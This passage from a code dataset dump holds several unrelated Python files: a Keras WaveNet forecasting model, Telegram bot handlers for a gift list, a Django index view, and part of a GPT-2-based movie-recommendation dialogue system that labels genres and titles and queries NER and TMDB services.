Dropout, Lambda, Multiply, Add, Concatenate, Reshape, TimeDistributed\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nfrom keras import regularizers\n\n\ndef root_mean_squared_error(y_true, y_pred):\n return K.sqrt(K.mean(K.square(y_pred - y_true)))\n\n\n\n#import predict size\ndef wavenet_model(predict_size, learning_rate, num_layers, stacks, dropout, input_size, n_filters):\n\n # convolutional operation parameters\n filter_width = 2 # considers the relation between two data points\n n_filters # capture X different properties of the data\n cond_in_channels= n_filters *(input_size-1) #keep\n residual_channels= n_filters *2 # has to be the same as gate channels ,for convolution at the beginning of residual block\n gate_channels= n_filters *2\n skip_channels= n_filters #no of filters at the skip connection\n out_channels= n_filters # no of filters a the penultimate convolution, last convolution is 1x1\n dilation_rates = [2 ** i for i in range(num_layers)]\n\n #input is a sort of input layer\n # define an input history series and pass it through a stack of dilated causal convolution blocks.\n initialiser= 'glorot_uniform' #or he_uniform for kaimain intialisation\n\n\n history_seq = Input(shape=(None, input_size)) #\n\n\n x = Lambda(lambda x: x[:, :, 0:1] )(history_seq) #this selects only the first feature\n\n ## x = Conv1D(x_in_channels, 1, kernel_initializer=initialiser, padding='same', activation='relu')(x) #not used\n\n if input_size>1:\n c= Lambda(lambda x: x[:, :, 1:])(history_seq)\n c_conv = Conv1D(cond_in_channels, 1, kernel_initializer=initialiser, padding='same', activation='relu')(c) # convolution on 
input conditional input, sort of pre-processing\n\n skips = []\n for dilation_rate in dilation_rates:\n\n # preprocessing - equivalent to time-distributed dense\n x = Conv1D(residual_channels, 1, kernel_initializer= initialiser,padding='same', activation='relu')(x)\n\n #no of filters here is g_channels\n x_dil_conv = Conv1D(filters=gate_channels,\n kernel_size=filter_width,kernel_initializer= initialiser,\n padding='causal',\n dilation_rate=dilation_rate)(x)\n\n if input_size >1 and dilation_rate==1:\n\n c_conv = Conv1D(gate_channels, filter_width, padding='causal')(c_conv) #g -gates\n tanh_gate= Add()([x_dil_conv, c_conv])\n sigm_gate = Add()([x_dil_conv, c_conv])\n\n else:\n tanh_gate = x_dil_conv\n sigm_gate = x_dil_conv\n\n\n #multiply filter and gating branches\n z = Multiply()([Activation('tanh')(tanh_gate),\n Activation('sigmoid')(sigm_gate)])\n\n # postprocessing - equivalent to time-distributed dense\n s = Conv1D(skip_channels, 1, padding='same', kernel_initializer= initialiser,activation='relu')(z)\n z = Conv1D(residual_channels, 1, padding='same',kernel_initializer= initialiser, activation='relu')(z)\n\n # residual connection used as input in next dilation\n x = Add()([x_dil_conv, z])\n\n # collect skip connections for final output\n skips.append(s)\n\n # add all skip connection outputs\n out = Activation('relu')(Add()(skips))\n\n # final time-distributed dense layers\n out = Conv1D(out_channels, 3, kernel_initializer= initialiser,padding='causal')(out) #is kernel size 1 in traditional setup #was 3\n out = Activation('relu')(out)\n\n out = Activation('relu')(out)\n out = Dropout(dropout)(out)\n\n out = Conv1D(1, 1, kernel_initializer= initialiser, padding='same')(out) #out shape [B, S, F] same no of samples as training seq\n\n\n pred_seq_train = Lambda(lambda x: x[:, :, :])(out)\n receptive_field_size= ((sum(dilation_rates) * stacks) * (filter_width - 1)) + 1\n print('Receptive fiels is : ', receptive_field_size)\n\n model = Model(history_seq, pred_seq_train) #input, output\n model.compile(Adam(learning_rate=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),\n loss=root_mean_squared_error)\n\n return model\n\n","sub_path":"wavenet_model_keras.py","file_name":"wavenet_model_keras.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454150959","text":"from main import bot, dp\nfrom aiogram.types import Message\nfrom config import admin_id\nfrom aiogram.dispatcher.storage import FSMContext\nfrom states import ChooseMode, CurrentLists\nfrom CurrentList import default_list, CurrentList\n\nSTART_MESSAGE = \"Бот запущен\"\ncurrent_list_key = 'current_list'\n\n\nasync def send_to_admin(*args):\n await bot.send_message(chat_id=admin_id, text=START_MESSAGE)\n\n\n@dp.message_handler(commands=[\"my_list\"])\nasync def show_list(message: Message, state: FSMContext):\n data = await state.get_data()\n current_list = data.get(current_list_key)\n if current_list is None:\n current_list = default_list\n await state.update_data(current_list=current_list)\n await message.answer(str(current_list))\n await CurrentLists.Show.set()\n\n\n@dp.message_handler(state=CurrentLists.Show, commands=[\"add\"])\nasync def add_item_request(message: Message):\n text = f\"Введите название подарка\"\n await message.answer(text)\n await CurrentLists.AddItem.set()\n\n\n@dp.message_handler(state=CurrentLists.AddItem)\nasync def add_item(message: Message, state: FSMContext):\n data = await state.get_data()\n 
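    # state.get_data() returns the dict stored earlier through state.update_data(), so the
    # direct indexing below assumes /my_list already ran and seeded current_list_key.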
current_list = data[current_list_key]\n current_list.add_item(message.text)\n await state.update_data(current_list=current_list)\n await message.answer(data[current_list_key])\n await CurrentLists.Show.set()\n\n\n@dp.message_handler(state=CurrentLists.Show, commands=[\"remove\"])\nasync def remove_item_request(message: Message):\n text = f\"Введите номер подарка\"\n await message.answer(text)\n await CurrentLists.RemoveItem.set()\n\n\n@dp.message_handler(state=CurrentLists.RemoveItem)\nasync def remove_item(message: Message, state: FSMContext):\n data = await state.get_data()\n current_list = data[current_list_key]\n current_list.remove_item(int(message.text))\n await state.update_data(current_list=current_list)\n await message.answer(data[current_list_key])\n await CurrentLists.Show.set()\n\n","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319015818","text":"from django.shortcuts import render, redirect\nfrom django.views.generic import TemplateView\n\n\nclass SignUpView(TemplateView):\n template_name = 'registration/signup.html'\n\n\ndef index(request):\n\tif request.user.is_authenticated:\n\t\tif request.user.is_instructor:\n\t\t\treturn redirect('instructors:topic_change_list')\n\t\telse:\n\t\t\treturn redirect('students:topic_list')\n\treturn render(request, 'codecat/index.html')\n","sub_path":"codecat/views/codecat.py","file_name":"codecat.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73718247","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nimport tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader, Dataset\nfrom torch.nn.utils.rnn import pad_sequence\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer, GPT2Config\nfrom transformers import BertTokenizer\nimport random\nimport os\nimport nltk\nimport collections\nimport string\nimport json, requests\nimport re\n\nimport json\nimport requests\nfrom urllib.request import urlopen\nimport string\nimport pandas as pd\n\nimport numpy as np\nimport pickle\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport pandas as pd\nimport pickle\nimport string \n\n\ndef top_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k, top-p (nucleus) and/or threshold filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k: <=0: no filtering, >0: keep only top k tokens with highest probability.\n top_p: <=0.0: no filtering, >0.0: keep only a subset S of candidates, where S is the smallest subset\n whose total probability mass is greater than or equal to the threshold top_p.\n In practice, we select the highest probability tokens whose cumulative probability mass exceeds\n the threshold top_p.\n \"\"\"\n # batch support!\n if top_k > 0:\n values, _ = torch.topk(logits, top_k)\n min_values = values[:, -1].unsqueeze(1).repeat(1, logits.shape[-1])\n logits = torch.where(logits < min_values, \n torch.ones_like(logits, dtype=logits.dtype) * -float('Inf'), \n logits)\n if top_p > 0.0:\n # Compute cumulative probabilities of sorted tokens\n sorted_logits, sorted_indices = torch.sort(logits, descending=True)\n cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative 
probability above the threshold\n sorted_indices_to_remove = cumulative_probabilities > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n \n sorted_logits = sorted_logits.masked_fill_(sorted_indices_to_remove, filter_value)\n logits = torch.zeros_like(logits).scatter(1, sorted_indices, sorted_logits)\n \n return logits\n\ndef nGramBlock(sent, n):\n duplication = False\n tokens = sent\n ngram_list = []\n for i in range(len(tokens)-n + 1):\n ngram_list.append(tuple(tokens[i: i+n]))\n ngram_set = set(ngram_list)\n if len(ngram_set) != len(ngram_list):\n duplication = True\n return duplication\n\n\ndef preprocess(text):\n\tnew_text = text.lower()\n\tpunctuations = set(string.punctuation)\n\treturned_text = \"\"\n\tfor idx in range(len(new_text)):\n\t\tchars = new_text[idx]\n\t\tif chars in punctuations:\n\t\t\tif idx-1 >= 0 and idx+1 < len(new_text):\n\t\t\t\tif new_text[idx-1].isalpha() and new_text[idx+1].isalpha():\n\t\t\t\t\treturned_text += new_text[idx]\n\t\telse:\n\t\t\t\n\t\t\treturned_text += new_text[idx]\n\treturn returned_text\n\ngenre_dict = {'humor': 'comedy', 'science': 'sci-fi', 'animation': 'animation', 'animations': 'animation', 'animated': 'animation', 'comedy': 'comedy', 'comedies': 'comedy', 'funny': 'comedy', 'crime': 'crime', 'crimes': 'crime', 'thriller': 'thriller', 'thrillers': 'thriller', 'mystery': 'mystery', 'mysteries': 'mystery', 'musical': 'musical', 'biography': 'biography', 'biographies': 'biography', 'history': 'history', 'histories': 'history', 'romance': 'romance', 'romantic': 'romance', 'romantic': 'romance', 'sport': 'sport', 'western': 'western', 'documentary': 'documentary', 'documentaries': 'documentary', 'news': 'news', 'horror': 'horror', 'horrors': 'horror', 'scify': 'sci-fi', 'sci': 'sci-fi', 'scifi': 'sci-fi', 'sci fy': 'sci-fi', 'sci-fi': 'sci-fi', 'science fiction': 'sci-fi', 'super hero': 'action', 'superhero': 'action', 'adventure': 'adventure', 'drama':'drama', 'dramas': 'drama', 'family': 'family', 'war':'war', 'fantasy':'fantasy', 'action':'action'}\ndef label_genre(input_text, genres):\n\tnew_text = []\n\tthe_list = input_text.split(\" \")\n\tidx_list = []\n\tfor idx, token in enumerate(the_list):\n\t\tthe_token = preprocess(token)\n\t\tif the_token in genre_dict:\n\t\t\tif the_token == \"family\" or the_token == \"war\" or the_token == \"funny\" or the_token ==\"mystery\" or the_token ==\"animated\" or the_token ==\"romantic\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"movie\" in next_token:\n\t\t\t\t\t\treal_genre = genre_dict[preprocess(token)]\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"science\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"fiction\" in next_token:\n\t\t\t\t\t\treal_genre = \"sci-fi\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"sci\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = 
the_list[idx+1]\n\t\t\t\t\tif \"fi\" in next_token or \"fy\" in next_token:\n\t\t\t\t\t\treal_genre = \"sci-fi\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telif the_token == \"humor\":\n\t\t\t\tif idx+1 < len(the_list):\n\t\t\t\t\tnext_token = the_list[idx+1]\n\t\t\t\t\tif \"genre\" in next_token:\n\t\t\t\t\t\treal_genre = \"comedy\"\n\t\t\t\t\t\tif real_genre not in genres:\n\t\t\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\t\t\t\t\tidx_list.append(real_genre)\n\t\t\telse:\t\t\t\t\t\t\n\t\t\t\treal_genre = genre_dict[preprocess(token)]\n\t\t\t\tif real_genre not in genres:\n\t\t\t\t\tgenres[real_genre] = len(genres)\n\t\t\t\tgenre_idx = genres[real_genre]\n\t\t\t\tidx_list.append(real_genre)\n\t\t\t\tnew_text.append(\"[MOVIE_GENRE_\"+str(genre_idx)+\"]\")\n\t\telse:\n\t\t\t new_text.append(token)\n\treturned_text = \" \".join(new_text)\n\tif idx_list == []:\n\t\treturned_text = input_text\n\treturn returned_text, genres, idx_list\n\ndef add_SEP(text, idx_list, case=\"genre\"):\n if \"[SEP]\" not in text:\n text = text + \" [SEP] \"\n text += case + \": \" + \", \".join(idx_list)\n return text+\";\"\n\ndef remove_duplicate_movie_plots(text):\n text = text.replace(\"by [MOVIE_P_DIRECTOR\", \"with [MOVIE_P_ACTOR\")\n text = text.replace(\"P_DIRECTOR\", \"P_ACTOR\")\n if debug_print:\n print(\"Before remove duplication: \" + text)\n split_by_movie_plot = text.split(\"[MOVIE_PLOT]\")\n if len(split_by_movie_plot) > 2:\n #remove the second plot\n mv_plot_counter = 0\n temp_list = []\n first = split_by_movie_plot[0].strip() + \" [MOVIE_PLOT] \"\n second = split_by_movie_plot[1].strip()\n #process second\n remove_last = second.split(\"<\")\n second = \"<\".join(remove_last[:len(remove_last)-1])\n return (first + second).strip()\n else:\n return text\n\ndef convert_back(text, the_dict, proposed_result, case=\"GENRE\", template_movie=None, template_genre=\"action\"):\n\n if debug_print:\n print(\"orig: \" + text)\n if \"\" in text:\n the_text_list = text.split(\"\")\n text_result = []\n for idx, element in enumerate(the_text_list):\n if idx == 0:\n if element != \"\":\n text_result.append(element)\n else:\n other_text = element.split(\"<\")\n with_credibility = other_text[0]\n \n rest_of_text = \"<\".join(other_text[1:])\n tokenized_cred = with_credibility.split(\" \")\n\n if len(tokenized_cred) < 15:\n text_result.append(with_credibility)\n if rest_of_text != \"\":\n rest_of_text = \"<\"+rest_of_text\n text_result.append(rest_of_text)\n \n if debug_print:\n print(\"rest of text: \" + rest_of_text)\n \n if text_result != []:\n text = \"\"\n for component in text_result:\n component = component.strip()\n if component[0] != \"<\":\n component = \"\"+component\n else:\n component += \"The plot is like this: [MOVIE_PLOT]\" #updated here\n text += component + \" \"\n text = text.strip()\n else:\n text = \"The plot is like this: [MOVIE_PLOT]\"\n\n if debug_print:\n print(\"processed credibility: \" + text)\n orig = text.split(\"[SEP]\")\n text = orig[0].strip()\n \n# text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', text).strip()\n text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', '[TEMP_SPLIT]', text).strip()\n temp_sentences = text.split(\"[TEMP_SPLIT]\")\n the_sentences = []\n for temp_sent in 
temp_sentences:\n tokenized_temp = temp_sent.strip().split(\" \")\n last_token = tokenized_temp[len(tokenized_temp)-1].strip()\n\n if \"[MOVIE_\" in last_token and last_token[len(last_token)-1] == \"]\":\n if \"did\" in tokenized_temp[0].lower() or \"do\" in tokenized_temp[0].lower() or \"have\" in tokenized_temp[0].lower() or \"who\" in tokenized_temp[0].lower() or \"what\" in tokenized_temp[0].lower() or \"how\" in tokenized_temp[0].lower():\n tokenized_temp[len(tokenized_temp)-1] += \" ?\"\n else:\n if \"[MOVIE_PLOT]\" not in tokenized_temp[len(tokenized_temp) -1]:\n tokenized_temp[len(tokenized_temp)-1] += \" .\"\n joined_tokens = \" \".join(tokenized_temp)\n the_sentences.append(joined_tokens)\n \n text = \" \".join(the_sentences)\n if debug_print:\n print(\"TEXT: \" + text)\n \n new_text = []\n tokenized_text = text.split(\" \")\n placeholder_id_to_text = {y:x for x,y in the_dict.items()}\n if debug_print:\n print(placeholder_id_to_text)\n i = 0\n mentioned_movie = \"\"\n has_the_word_and = False\n taken_idx = {}\n for token in tokenized_text:\n if \"[MOVIE_\"+case+\"_\" in token or (case == \"TITLE\" and \"TITLE\" in token):\n the_tokens = token.split(\"[MOVIE_\")\n if debug_print:\n print(\"the tokens: \" + str(the_tokens))\n for more_token in the_tokens:\n if case+\"_\" in more_token:\n ending = more_token.split(\"]\")\n for ttoken in ending:\n if case+\"_\" in ttoken:\n index_old = ttoken.split(\"_\")[1]\n\n new_idx = \"\"\n for chars in index_old:\n if chars != \"]\":\n new_idx += chars\n else:\n break\n new_idx = int(new_idx)\n\n if new_idx in placeholder_id_to_text:\n \n if has_the_word_and and new_idx +1 in placeholder_id_to_text:\n new_idx = new_idx + 1\n real_word = placeholder_id_to_text[new_idx]\n \n \n taken_idx[new_idx] = True\n else:\n if i < len(proposed_result):\n real_word = proposed_result[i]\n i += 1\n else:\n if case==\"GENRE\":\n real_word = template_genre\n elif case == \"TITLE\":\n if proposed_result == []:\n real_word = template_movie\n mentioned_movie = real_word\n else:\n real_word = proposed_result[i]\n mentioned_movie = real_word\n i += 1\n if real_word not in the_dict:\n the_dict[real_word] = len(the_dict)\n# i += 1\n if real_word != \"\":\n if case == \"TITLE\":\n \n split_real_word = real_word.strip().split(\" \")\n no_year = split_real_word[:len(split_real_word)-1]\n if debug_print:\n print(\"test new idx: no year\" + (\" \".join(no_year)).strip())\n new_text.append((\" \".join(no_year)).strip())\n mentioned_movie = real_word\n else:\n if real_word == \"family\" or real_word == \"war\":\n real_word += \" movies\"\n new_text.append(real_word.strip())\n mentioned_movie = real_word.strip() #it's actually genre here\n \n else:\n if ttoken != \"\":\n new_text.append(ttoken.strip())\n if ttoken == \"and\":\n has_the_word_and =True\n else:\n if more_token != \"\":\n new_text.append(more_token.strip())\n else:\n new_text.append(token.strip())\n \n \n result_text = \" \".join(new_text)\n if mentioned_movie != \"\":\n if case == \"TITLE\":\n movie_no_year_split = mentioned_movie.split(\" \")\n movie_no_year = \" \".join(movie_no_year_split[:len(movie_no_year_split)-1])\n else:\n movie_no_year = mentioned_movie\n\n fix_period_or_question_mark = result_text.split(movie_no_year)\n temp_list = []\n for text in fix_period_or_question_mark:\n clean_text = text.strip()\n if len(clean_text) >= 1 and clean_text[0] not in set(string.punctuation):\n clean_text = \" \"+clean_text\n temp_list.append(clean_text)\n result_text = (\" \" +movie_no_year).join(temp_list)\n\n 
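    # At this point every [MOVIE_<case>_i] placeholder in result_text has been replaced by its
    # surface string, the_dict maps each surface string to its placeholder id for later turns,
    # and mentioned_movie holds the last title (or genre) substituted, which the punctuation
    # fix-up above relies on.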
return result_text, the_dict, mentioned_movie\n\ndef force_rec(text, the_dict, proposed_result, template_movie=None):\n if debug_print:\n print(\"FORC REC orig: \" + text)\n text = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', text).strip()\n orig = text.split(\"[SEP]\")\n text = orig[0].strip()\n new_text = []\n tokenized_text = text.split(\" \")\n placeholder_id_to_text = {y:x for x,y in the_dict.items()}\n if debug_print:\n print(placeholder_id_to_text)\n i = 0\n template_genre = \"action\"\n mentioned_movie = \"\"\n for token in tokenized_text:\n if \"TITLE_\" in token:\n the_tokens = token.split(\"[MOVIE_\")\n if debug_print:\n print(\"the tokens: \" + str(the_tokens))\n for more_token in the_tokens:\n if \"TITLE_\" in more_token:\n ending = more_token.split(\"]\")\n for ttoken in ending:\n if \"TITLE_\" in ttoken:\n real_word = template_movie\n if i < len(proposed_result):\n if proposed_result[i] not in the_dict:\n if debug_print:\n print(\"Force rec: \" + proposed_result[i])\n real_word = proposed_result[i]\n i += 1\n else:\n i +=1\n else:\n real_word = template_movie\n \n mentioned_movie = real_word\n if real_word not in the_dict:\n the_dict[real_word] = len(the_dict)\n\n if real_word != \"\":\n split_real_word = real_word.split(\" \")\n no_year = \" \".join(split_real_word[:len(split_real_word)-1])\n new_text.append(no_year.strip())\n else:\n real_word = template_movie\n new_text.append(real_word.strip())\n else:\n if ttoken != \"\":\n new_text.append(ttoken.strip())\n else:\n if more_token != \"\":\n new_text.append(more_token.strip())\n else:\n new_text.append(token.strip())\n \n result_text = \" \".join(new_text)\n if mentioned_movie != \"\":\n \n movie_no_year_split = mentioned_movie.split(\" \")\n movie_no_year = \" \".join(movie_no_year_split[:len(movie_no_year_split)-1])\n\n fix_period_or_question_mark = result_text.split(movie_no_year)\n temp_list = []\n for text in fix_period_or_question_mark:\n clean_text = text.strip()\n if len(clean_text) >= 1 and clean_text[0] not in set(string.punctuation):\n clean_text = \" \"+clean_text\n temp_list.append(clean_text)\n\n result_text = (\" \" +movie_no_year).join(temp_list)\n \n return result_text.strip(), the_dict, mentioned_movie\n\n\nMOVIE_URL= \"MOVIE_NER_SERVICE_URL\" # test\ndef fetch_ner(last_bot_response, user_utterance, url=MOVIE_URL):\n data = {\n 'last_bot_response': last_bot_response,\n 'user_utterance': user_utterance\n }\n headers = {\n 'Content-Type': 'application/json',\n }\n data = json.dumps(data)\n resp = requests.post(url, headers=headers, data=data, timeout=20)\n return resp.json() \n\n\ndef min_edit_distance(s1, s2):\n if len(s1) > len(s2):\n s1,s2 = s2,s1\n distances = range(len(s1) + 1)\n for index2,char2 in enumerate(s2):\n new_distances = [index2+1]\n for index1,char1 in enumerate(s1):\n if char1 == char2:\n new_distances.append(distances[index1])\n else:\n new_distances.append(1 + min((distances[index1],\n distances[index1+1],\n new_distances[-1])))\n distances = new_distances\n\n return distances[-1]\n\n\ndef movie_placeholder(text, raw):\n\ttokens = text.split()\n\t\n\tindexer = 0\n\tnew_text = []\n\tb_movie_counter = 0\n\twhile indexer < len(tokens):\n\t\ttoken = tokens[indexer]\n\t\ttag = raw[indexer]\n\t\tif tag == 'O':\n\t\t\tnew_text.append(token)\n\t\telse:\n\t\t\tif 'B-movies' in tag:\n\t\t\t\tnew_text.append(\"[MOVIE_TITLE]\")\n\t\t\t\tb_movie_counter += 1\n\t\t\telif \"-movies\" not in tag:\t\t\t\t\n\t\t\t\tnew_text.append(token)\n\t\tindexer += 1\n\ttext_with_placeholder = \" 
\".join(new_text)\n\treturn text_with_placeholder, b_movie_counter\n\ndef process_more_than_one_movie(movies, text, raw):\n\ttokens = text.split()\n\ttemp = []\n\tmovie_taken = {}\n\tcounter = 0\n\tfor movie in movies:\t\t\n\t\tmovie_taken[counter] = (movie, False)\n\t\tcounter += 1\n\n\tcounter = 0\n\tmovie_list = []\n\tif debug_print:\n\t\tprint(\"RAW: \" + str(raw))\n\tb_eval = 0\n\tb_movie = 0\n\tfor token, tag in zip(tokens, raw):\n\t\tif 'B-movies' in tag:\n\t\t\ttemp.append(token)\n\t\t\tb_movie += 1\n\t\telif 'I-movies' in tag:\n\t\t\ttemp.append(token)\n\t\t\tif debug_print:\n\t\t\t\tprint(temp)\n\t\telse:\n\t\t\t#evaluate temp\n\t\t\tnew_temp = preprocess(\" \".join(temp))\n\t\t\tif debug_print:\n\t\t\t\tprint(\"ELSE: \" + str(b_movie) + \" \" + str(b_eval) + \" \" + str(b_movie - 1))\n\t\t\tif b_eval == b_movie - 1:\n\t\t\t\twhile counter < len(movies):\n\t\t\t\t\tif not movie_taken[counter][1]:\n\t\t\t\t\t\ttitle = movie_taken[counter][0]['title']\n\t\t\t\t\t\tyear = movie_taken[counter][0]['year']\n\n\t\t\t\t\t\tscore = min_edit_distance(new_temp, preprocess(title))\n\t\t\t\t\t\tif score < 3:\n\t\t\t\t\t\t\tmovie_list.append(title + \" ({})\".format(year))\n\t\t\t\t\t\t\ttemp = []\n\t\t\t\t\t\t\tb_eval += 1\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tcounter += 1\n\n\tif b_eval == b_movie - 1:\n\t\tnew_temp = preprocess(\" \".join(temp))\n\t\twhile counter < len(movies):\n\t\t\tif not movie_taken[counter][1]:\n\t\t\t\ttitle = movie_taken[counter][0]['title']\n\t\t\t\tyear = movie_taken[counter][0]['year']\n\n\t\t\t\tscore = min_edit_distance(new_temp, preprocess(title))\n\t\t\t\tif score < 3:\n\t\t\t\t\tmovie_list.append(title + \" ({})\".format(year))\n\t\t\t\t\ttemp = []\n\t\t\t\t\tb_eval += 1\n\t\t\t\t\tbreak\n\t\t\tcounter += 1\n\treturn movie_list\n\ndef get_multiple_movies(real_text, movie_list):\n result = []\n dup_movies = {}\n for movie in movie_list:\n title = movie['title']\n if debug_print:\n print(\"title: \" + str(title))\n year = movie['year']\n movie_type = movie['type']\n\n if preprocess(title) in preprocess(real_text) and preprocess(title) not in dup_movies:\n result.append(title + \" ({})\".format(year))\n dup_movies[preprocess(title)] = 1\n return result\n\ntitle_to_tmdb = {}\ndef get_movies(ner_result, raw_text, movie_counter):\n\tmovie_list = ner_result['movie']\n\traw = ner_result['raw'][0]\n\ttext = preprocess(raw_text)\n\tif movie_list == []:\n\t\treturn \"\"\n\telse:\n\t\tmovies = []\n\t\tif movie_counter == 1:\n\t\t\ttitle = movie_list[0]['title']\n\t\t\tyear = movie_list[0]['year']\n\t\t\ttmdb = movie_list[0]['tmdbId']\n\t\t\ttokenized_title = preprocess(title).split(\" \")\n\t\t\tcounter = 0\n\t\t\tmovie_name = []\n\t\t\tfor token in tokenized_title:\n\t\t\t\tif token not in stop_words:\n\t\t\t\t\tif token in text.split(\" \"):\n\t\t\t\t\t\tcounter += 1\n\n\t\t\ttokenized_text = text.split(\" \")\n\t\t\tfor token, tag in zip(tokenized_text, raw):\n\t\t\t\tif \"-movies\" in tag:\n\t\t\t\t\tmovie_name.append(token)\n\n\t\t\ttotal_len = len(tokenized_title)\n\t\t\tnormalized = counter*100/total_len\n\n\t\t\tif total_len > 2:\n\t\t\t\tif normalized < 60:\t\t\t\t\t\n\t\t\t\t\treturn \"\"\n\t\t\tprocessed_movie_name = \t\" \".join(movie_name)\n\n\t\t\tif total_len <= 2:\n\t\t\t\tif normalized < 50:\n\t\t\t\t\tif total_len == 2:\n\t\t\t\t\t\tnew_title = title.replace(\" \", \"\").lower()\n\t\t\t\t\t\t\n\t\t\t\t\t\tif new_title in preprocess(processed_movie_name):\n\t\t\t\t\t\t\tresult_title = title + \" ({})\".format(year)\n\t\t\t\t\t\t\ttitle_to_tmdb[result_title] = 
tmdb\n\t\t\t\t\t\t\treturn result_title\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treturn \"\"\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn \"\"\n\t\t\ttitle_to_tmdb[title + \" ({})\".format(year)] = tmdb\n\t\t\treturn title + \" ({})\".format(year)\n\t\telif movie_counter > 1:\n\t\t\tresult = get_multiple_movies(text, movie_list)\n\t\t\tstr_result = \"; \".join(result)\n\t\t\treturn str_result\n\t\telse:\n\t\t\treturn \"\"\n\ndef process_movie_title(text_with_placeholder, movies, mentioned):\n\ttext_split = text_with_placeholder.split(\" \")\n\tmovie_in_text = movies.split(\";\")\n\ttaken_movie = []\n\tfor movie in movie_in_text:\n\t\tif movie not in taken_movie:\n\t\t\ttaken_movie.append(movie.strip())\n\tif debug_print:\n\t\tprint(taken_movie)\n\ttaken_movie.reverse()\n\tif debug_print:\n\t\tprint(\"new: \" + str(taken_movie))\n\t\tprint(\"------------\")\n\tresult = []\n\trelated_movie = \"\"\n\tfor token in text_split:\n\t\tif token == \"[MOVIE_TITLE]\":\n\t\t\tif len(taken_movie) > 0:\n\t\t\t\trelated_movie = taken_movie.pop()\n\t\t\tif related_movie not in mentioned:\n\t\t\t\tmv_idx = len(mentioned)\n\t\t\t\tmentioned[related_movie] = mv_idx\n\n\t\t\tthe_idx = mentioned[related_movie]\n\n\t\t\ttoken = \"[MOVIE_TITLE_{}]\".format(the_idx)\n\n\t\tresult.append(token)\n\n\tstr_result = \" \".join(result)\n\treturn str_result, mentioned\n\nstop_words = [\"of\", \"in\", \"the\", \"to\", \"is\", \"a\", \"on\", \"into\", \"with\"]\ndef create_movie_slot(rec_prev_utt, seeker_utt, movie_mentioned):\n rec = preprocess(re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', ' ', rec_prev_utt).strip())\n if debug_print:\n print(rec)\n seek = preprocess(seeker_utt)\n ner_result = fetch_ner(rec, seek)\n if debug_print:\n print(ner_result)\n text = preprocess(seek)\n try:\n raw = ner_result['raw'][0]\n except:\n return seeker_utt, \"\", movie_mentioned\n\n text_with_placeholder, movie_counter = movie_placeholder(text, raw)\n movie_result = get_movies(ner_result, text, movie_counter)\n if debug_print:\n print(\"movie result: \" + str(movie_result))\n print(text_with_placeholder)\n \n if movie_result == \"\":\n text_with_placeholder = seeker_utt\n mentioned = movie_mentioned\n else:\n if debug_print:\n print(\"debug here\")\n text_with_placeholder, mentioned = process_movie_title(text_with_placeholder, movie_result, movie_mentioned)\n \n return text_with_placeholder, movie_result, mentioned\n\nTMDB_KEY = \"TMDB_KEY\"\ndef load_movie_name(input_file):\n\tnames = pd.read_csv(input_file, sep=\"\\t\")\n\tname_list = names['Name'].values\n\n\treturn name_list\n\nperson_db = {}\nname_list = load_movie_name(\"TSV_MOVIE_DATA_PATH\")\n\ndef search_person(person_name):\n\tprocessed_person_name = person_name.replace(\" \", \"%20\")\n\tthe_url = \"apiURL\".format(TMDB_KEY, processed_person_name)\n\tperson_info_json = urlopen(the_url).read().decode('utf8')\n\tperson_info = json.loads(person_info_json)\n\treturn person_info\n\ndef person_is_there(person_info):\n\treturn person_info[\"total_results\"] > 0\n\ndef 